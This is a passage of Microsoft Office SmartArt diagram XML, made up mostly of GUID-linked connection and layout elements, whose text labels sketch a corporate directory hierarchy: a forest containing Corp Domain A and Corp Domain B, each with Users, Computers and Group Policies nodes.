    <dgm:cxn modelId="{08921E99-A4AB-4628-8803-745ED91EA782}" srcId="{1669F888-9F2C-4B15-A793-C5637AAC92B0}" destId="{FDE58124-BDB1-4754-A35C-EE2C2BC30F8D}" srcOrd="0" destOrd="0" parTransId="{0C7EE9EF-319A-4A42-8BB9-2C4F8A59EA83}" sibTransId="{D723BB84-302E-4780-9EAB-A877E0807FCF}"/>
    <dgm:cxn modelId="{83EE28A8-70D5-480E-9420-F7DB70F53C35}" type="presOf" srcId="{EF9227C0-292D-436A-9FD8-D448EE151841}" destId="{4585902A-F1F3-4996-A8CC-EBA43E41E4C7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{2579C3A9-6AC0-4516-82CF-F327B8F46641}" type="presOf" srcId="{891FD24D-881F-4F9D-B51D-CFAF1EFA6857}" destId="{2244965D-7591-49E1-9FBC-22137F31070D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{385E04B8-B55D-444B-9B1D-3AA66FE8502C}" type="presOf" srcId="{A5BD9F63-BAC4-4D6C-B14B-10BE263974C8}" destId="{1E21D677-DB3B-4FFE-8DE5-72D006486C57}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{300F90C3-7A34-49C1-84D5-6736A411C73C}" srcId="{098DE2E4-F389-4A55-878E-C22124505CAA}" destId="{5101C8FB-D9F4-4588-9F90-63B40BA01352}" srcOrd="2" destOrd="0" parTransId="{33D420ED-0A7B-4BB3-BDF6-6E5A10D72106}" sibTransId="{D8643620-F670-47F4-B00D-85B0491562C7}"/>
    <dgm:cxn modelId="{B7A558D5-7B85-413F-A049-4648BE7D2586}" type="presOf" srcId="{B2B34F4D-7060-476C-95E8-D9D1735919AF}" destId="{B7E70F3A-3294-4F74-9311-A5DEB165A591}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{49BB5BE5-7B10-4040-9C5D-AFECF2E597D1}" type="presOf" srcId="{DE9EEC66-7F23-4EB0-A770-DE271C408165}" destId="{D8688BF5-0D1D-4290-A0F8-022A7497C29A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{C8DA24EB-7C05-4BF5-9C5A-8B6E9BF95F97}" srcId="{6D26A800-4731-4A2B-949E-54C60AF6EFEB}" destId="{42DF16AA-0E8B-4841-9C37-0A708ED895ED}" srcOrd="1" destOrd="0" parTransId="{F6B01B23-5760-4CA9-9C76-52EC1C16317A}" sibTransId="{70AC9F08-266E-4B7B-A777-036E72858F27}"/>
    <dgm:cxn modelId="{BDBA34F0-5E4F-4386-9CEC-5CB8AB30DB0E}" type="presOf" srcId="{42DF16AA-0E8B-4841-9C37-0A708ED895ED}" destId="{54E00F42-331A-4D26-ADE5-1A3CFCF57DAA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{35EBB124-0FF9-4519-BA80-B24F30FAFBFA}" type="presParOf" srcId="{D23AFFFF-3E4A-491B-B074-B29A3B3B4626}" destId="{F3CD1363-2EFD-4975-956C-474B5BB45928}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{658E1E2B-ABFC-4E0B-B372-34A9C8A66E07}" type="presParOf" srcId="{F3CD1363-2EFD-4975-956C-474B5BB45928}" destId="{F2526BE4-330A-4E49-9B65-C20DE432B7D1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{C82A1276-C349-4B40-AFF8-CCC4C4F3AAC0}" type="presParOf" srcId="{F2526BE4-330A-4E49-9B65-C20DE432B7D1}" destId="{CC1248F8-3F45-41D0-ACF8-14820D353F17}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{773F9243-C061-4383-ABF5-0F3FC9C642CC}" type="presParOf" srcId="{CC1248F8-3F45-41D0-ACF8-14820D353F17}" destId="{F78904E0-C840-40DD-9C13-CC99CFEC0832}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{FE9EEF73-0E00-43BA-84A1-7C74E0E74D69}" type="presParOf" srcId="{CC1248F8-3F45-41D0-ACF8-14820D353F17}" destId="{C9036395-1A56-4742-8E25-FC3096AB24CF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{6CB080E7-0B54-4D24-9593-D25812DF71F4}" type="presParOf" srcId="{C9036395-1A56-4742-8E25-FC3096AB24CF}" destId="{12070763-096B-480C-BC1D-D3C3940E7095}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{C78F58E4-E395-43EC-9C4F-614CA98A6E1A}" type="presParOf" srcId="{C9036395-1A56-4742-8E25-FC3096AB24CF}" destId="{84E273EB-B150-4F18-B238-69357B90596B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{355E3C4E-4293-4270-97FB-CD0C8959650B}" type="presParOf" srcId="{84E273EB-B150-4F18-B238-69357B90596B}" destId="{4245D224-5BFB-4EFD-89E5-C81F05C16168}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{A68B64AA-40DB-417B-9E60-87C846036AB2}" type="presParOf" srcId="{84E273EB-B150-4F18-B238-69357B90596B}" destId="{FB4443BC-D5C4-4661-B241-399E234BF837}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{E4426D6E-1D7A-421E-8A30-C9A7919FB9AC}" type="presParOf" srcId="{FB4443BC-D5C4-4661-B241-399E234BF837}" destId="{C2A63189-D2C1-427E-81B0-516F8DCD5186}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{C7A462F5-8983-4B3E-98DD-26FE6D6905B9}" type="presParOf" srcId="{FB4443BC-D5C4-4661-B241-399E234BF837}" destId="{BB1DE497-4441-4096-BF23-63C9028C3B33}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{8638BFF4-EE08-4872-983C-37D7F8CF736F}" type="presParOf" srcId="{BB1DE497-4441-4096-BF23-63C9028C3B33}" destId="{2244965D-7591-49E1-9FBC-22137F31070D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{79BD39AC-AC95-4324-8CCC-1F5FDD1975B6}" type="presParOf" srcId="{BB1DE497-4441-4096-BF23-63C9028C3B33}" destId="{5F070A77-83FE-4D7C-9B24-182BD43DB390}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{8143633E-52D3-4469-9BC1-0C1352061926}" type="presParOf" srcId="{FB4443BC-D5C4-4661-B241-399E234BF837}" destId="{1EC2439A-98B1-4E55-82DF-A5B146C795CA}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{CF41AFF1-59A2-4511-8D5A-1B1DBF04D2EA}" type="presParOf" srcId="{FB4443BC-D5C4-4661-B241-399E234BF837}" destId="{AD861038-A287-4E9A-8CE5-B798689126B2}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{BE71F72F-0C9D-4AF1-83A4-435B26CD7500}" type="presParOf" srcId="{AD861038-A287-4E9A-8CE5-B798689126B2}" destId="{54E00F42-331A-4D26-ADE5-1A3CFCF57DAA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{ABE8263B-C795-4C44-B96F-3BFE35A6620F}" type="presParOf" srcId="{AD861038-A287-4E9A-8CE5-B798689126B2}" destId="{47FF2959-598C-46F0-9330-7B0CB1D0BBD2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{625AC0B1-CC73-4754-81CE-592FA868BA9F}" type="presParOf" srcId="{FB4443BC-D5C4-4661-B241-399E234BF837}" destId="{EBFD7AFF-86BD-4635-ABAE-B3C416549986}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{C5E68BCD-CA7E-4E9A-8276-8071EAAB40E9}" type="presParOf" srcId="{FB4443BC-D5C4-4661-B241-399E234BF837}" destId="{F637224E-2251-4A63-8030-C11CFF78588A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{45731EF2-0E89-49B1-BAA9-0C6244996229}" type="presParOf" srcId="{F637224E-2251-4A63-8030-C11CFF78588A}" destId="{4585902A-F1F3-4996-A8CC-EBA43E41E4C7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{0BAA5690-10A0-4343-8E87-CD210B740C5A}" type="presParOf" srcId="{F637224E-2251-4A63-8030-C11CFF78588A}" destId="{0576E273-6A98-4580-AB51-DAEE607171A0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{7853E75A-0F99-42F4-B7B5-9B34B1CC001F}" type="presParOf" srcId="{C9036395-1A56-4742-8E25-FC3096AB24CF}" destId="{E587D9DA-AA38-4331-B065-7E48925822F7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{C18B31A8-5B84-462A-890A-082A9713AB16}" type="presParOf" srcId="{C9036395-1A56-4742-8E25-FC3096AB24CF}" destId="{1153FCD8-274D-4AF9-A90D-F382D40AFB2A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{3FBCA19F-F401-4B78-8517-6AF0D80734C2}" type="presParOf" srcId="{1153FCD8-274D-4AF9-A90D-F382D40AFB2A}" destId="{C4ED751A-5E55-4DAC-9703-60F797FA12E1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{1423D301-7033-4868-A280-61A7ED8F180B}" type="presParOf" srcId="{1153FCD8-274D-4AF9-A90D-F382D40AFB2A}" destId="{511E3402-0F52-46B5-A76E-B9E70D4899EF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{DDE44EE1-CB79-43FE-ACF3-74C49E4E35C4}" type="presParOf" srcId="{511E3402-0F52-46B5-A76E-B9E70D4899EF}" destId="{DD4DD9C6-4286-4880-B04F-8E722ADE0464}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{A321DE76-E954-49E4-9923-9940CB9C1B00}" type="presParOf" srcId="{511E3402-0F52-46B5-A76E-B9E70D4899EF}" destId="{E8565F18-52ED-45E6-9E00-FEFD6D775A4F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{741C4BD0-6652-45EC-ABA7-3FE74A813564}" type="presParOf" srcId="{E8565F18-52ED-45E6-9E00-FEFD6D775A4F}" destId="{D8688BF5-0D1D-4290-A0F8-022A7497C29A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{BC97046C-C389-4153-98D0-1718B5C89EBB}" type="presParOf" srcId="{E8565F18-52ED-45E6-9E00-FEFD6D775A4F}" destId="{B917239E-2D67-48C8-BE69-0490DB273B3F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{4C647981-45FD-4C27-98B9-F73EF16D664A}" type="presParOf" srcId="{511E3402-0F52-46B5-A76E-B9E70D4899EF}" destId="{B7E70F3A-3294-4F74-9311-A5DEB165A591}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{FEFCEB58-BF15-42F7-9417-DA602B8ADD3A}" type="presParOf" srcId="{511E3402-0F52-46B5-A76E-B9E70D4899EF}" destId="{3725CB65-0534-475B-AAFF-B4519D99A75E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{2A6BCA06-F338-41A0-8AB7-88E3CC0E934D}" type="presParOf" srcId="{3725CB65-0534-475B-AAFF-B4519D99A75E}" destId="{1E21D677-DB3B-4FFE-8DE5-72D006486C57}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{AA39E3B3-79C2-49F5-A997-31E0986E0546}" type="presParOf" srcId="{3725CB65-0534-475B-AAFF-B4519D99A75E}" destId="{3C1BE020-F37E-4041-B837-401C86DA3F38}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{54B41F33-0CAE-485A-B8FE-1F92BFAEF316}" type="presParOf" srcId="{511E3402-0F52-46B5-A76E-B9E70D4899EF}" destId="{99D194A7-99DA-49C5-A486-BDFB7BB00D28}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{AA5DAFA6-89EE-447E-9B67-F1A1F554E92F}" type="presParOf" srcId="{511E3402-0F52-46B5-A76E-B9E70D4899EF}" destId="{70F40F0D-181B-43E4-8DED-64FF506203A5}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{E4FF1EC5-DCDF-4E37-BD4A-D47D52D5021E}" type="presParOf" srcId="{70F40F0D-181B-43E4-8DED-64FF506203A5}" destId="{73699A23-4386-4222-AD29-1501CCA6FE77}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{618BC51B-32D3-4E62-92DE-0C78CA07B0DC}" type="presParOf" srcId="{70F40F0D-181B-43E4-8DED-64FF506203A5}" destId="{D25B3EC3-F917-49C2-9526-534AA2C4F2A0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{0F0C813C-228F-422D-A3A5-909BCCF89988}" type="presParOf" srcId="{D23AFFFF-3E4A-491B-B074-B29A3B3B4626}" destId="{078CEAFF-D0BE-46B2-8C72-84C067F8CB2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9F888-9F2C-4B15-A793-C5637AAC92B0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E58124-BDB1-4754-A35C-EE2C2BC30F8D}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Corp Forest</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C7EE9EF-319A-4A42-8BB9-2C4F8A59EA83}" type="parTrans" cxnId="{08921E99-A4AB-4628-8803-745ED91EA782}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D723BB84-302E-4780-9EAB-A877E0807FCF}" type="sibTrans" cxnId="{08921E99-A4AB-4628-8803-745ED91EA782}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{891FD24D-881F-4F9D-B51D-CFAF1EFA6857}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Users</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{478CDBB9-3864-4F8A-80A9-6BA04B4AC7E1}" type="parTrans" cxnId="{25674C93-AFBF-4B34-B2B3-865F56BC98D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{28165A5F-9E3F-4FF9-8A71-870779BFC89A}" type="sibTrans" cxnId="{25674C93-AFBF-4B34-B2B3-865F56BC98D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{42DF16AA-0E8B-4841-9C37-0A708ED895ED}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Computers</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6B01B23-5760-4CA9-9C76-52EC1C16317A}" type="parTrans" cxnId="{C8DA24EB-7C05-4BF5-9C5A-8B6E9BF95F97}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{70AC9F08-266E-4B7B-A777-036E72858F27}" type="sibTrans" cxnId="{C8DA24EB-7C05-4BF5-9C5A-8B6E9BF95F97}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{098DE2E4-F389-4A55-878E-C22124505CAA}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Corp Domain B</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A7F467F9-0EC1-46EE-866E-FE8A1CE9F823}" type="parTrans" cxnId="{35A1FF35-8123-4A41-958B-C5A5024FAFEA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CC5E1860-416E-4E87-A70C-0DFEA35A6D71}" type="sibTrans" cxnId="{35A1FF35-8123-4A41-958B-C5A5024FAFEA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D26A800-4731-4A2B-949E-54C60AF6EFEB}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Corp Domain A</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8DB3CA45-0A46-4D2C-B861-5B22EF27917B}" type="parTrans" cxnId="{BCF43C68-6C29-4E36-AD0B-8F2930F2E002}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F0E27FC-1F8D-45C1-B7E8-ADD259BFFDBF}" type="sibTrans" cxnId="{BCF43C68-6C29-4E36-AD0B-8F2930F2E002}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF9227C0-292D-436A-9FD8-D448EE151841}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Group Policies</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B96A50DD-1697-43F0-B3FA-758757BC828B}" type="parTrans" cxnId="{18CAA028-D749-498D-8254-EE8DB2940D71}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F30B0E0-AA83-44C1-9657-E8C1EADF4905}" type="sibTrans" cxnId="{18CAA028-D749-498D-8254-EE8DB2940D71}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE9EEC66-7F23-4EB0-A770-DE271C408165}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Computers</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D3226D5-478E-4FA6-9C42-CC27A2DC11F0}" type="parTrans" cxnId="{7581734F-BE92-4993-BC0D-888A31E885A0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91926B99-98F4-4510-8BF5-964D4F1163BD}" type="sibTrans" cxnId="{7581734F-BE92-4993-BC0D-888A31E885A0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A5BD9F63-BAC4-4D6C-B14B-10BE263974C8}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Users</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2B34F4D-7060-476C-95E8-D9D1735919AF}" type="parTrans" cxnId="{55DCDD80-E59E-4AEC-8A0F-D84C72D02C1A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{002DA0A2-B126-470E-A6FB-8371F63DB1B1}" type="sibTrans" cxnId="{55DCDD80-E59E-4AEC-8A0F-D84C72D02C1A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5101C8FB-D9F4-4588-9F90-63B40BA01352}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Group Policies</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33D420ED-0A7B-4BB3-BDF6-6E5A10D72106}" type="parTrans" cxnId="{300F90C3-7A34-49C1-84D5-6736A411C73C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8643620-F670-47F4-B00D-85B0491562C7}" type="sibTrans" cxnId="{300F90C3-7A34-49C1-84D5-6736A411C73C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A4A8419-6C05-4D47-B4EC-ABBD6FE6B7EE}" type="pres">
      <dgm:prSet presAssocID="{1669F888-9F2C-4B15-A793-C5637AAC92B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D3A147-2588-4EB3-91FE-7F28F4B49969}" type="pres">
      <dgm:prSet presAssocID="{1669F888-9F2C-4B15-A793-C5637AAC92B0}" presName="hierFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B53225BB-3C1C-4698-8AB1-204610898F51}" type="pres">
      <dgm:prSet presAssocID="{1669F888-9F2C-4B15-A793-C5637AAC92B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4DBAC4-187D-487E-9402-8F0BCD38AE04}" type="pres">
      <dgm:prSet presAssocID="{FDE58124-BDB1-4754-A35C-EE2C2BC30F8D}" presName="Name14" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9C1013C6-BAA6-4F14-A64B-590DF6E0DEA9}" type="pres">
      <dgm:prSet presAssocID="{FDE58124-BDB1-4754-A35C-EE2C2BC30F8D}" presName="level1Shape" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F7531C00-8040-49AB-97D5-95AA58F84215}" type="pres">
      <dgm:prSet presAssocID="{FDE58124-BDB1-4754-A35C-EE2C2BC30F8D}" presName="hierChild2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{42C2455E-969F-4073-9BDE-1FC8C20F2D4D}" type="pres">
      <dgm:prSet presAssocID="{8DB3CA45-0A46-4D2C-B861-5B22EF27917B}" presName="Name19" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C7750885-3495-4E9F-9C6C-D8E633B9717C}" type="pres">
      <dgm:prSet presAssocID="{6D26A800-4731-4A2B-949E-54C60AF6EFEB}" presName="Name21" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{684BA7FD-EBBD-4005-BBCB-D19B4D0D812B}" type="pres">
      <dgm:prSet presAssocID="{6D26A800-4731-4A2B-949E-54C60AF6EFEB}" presName="level2Shape" presStyleLbl="node2" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2C95A048-4C2D-4E2F-AD63-2570B3A44ECA}" type="pres">
      <dgm:prSet presAssocID="{6D26A800-4731-4A2B-949E-54C60AF6EFEB}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F584CCEC-AD0A-4A8C-9DEF-7D52E53E58A6}" type="pres">
      <dgm:prSet presAssocID="{478CDBB9-3864-4F8A-80A9-6BA04B4AC7E1}" presName="Name19" presStyleLbl="parChTrans1D3" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0E6E1C5A-AA79-4542-8291-682EFDE355F9}" type="pres">
      <dgm:prSet presAssocID="{891FD24D-881F-4F9D-B51D-CFAF1EFA6857}" presName="Name21" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1F940748-11C5-4993-980E-0D83A9775A6A}" type="pres">
      <dgm:prSet presAssocID="{891FD24D-881F-4F9D-B51D-CFAF1EFA6857}" presName="level2Shape" presStyleLbl="node3" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
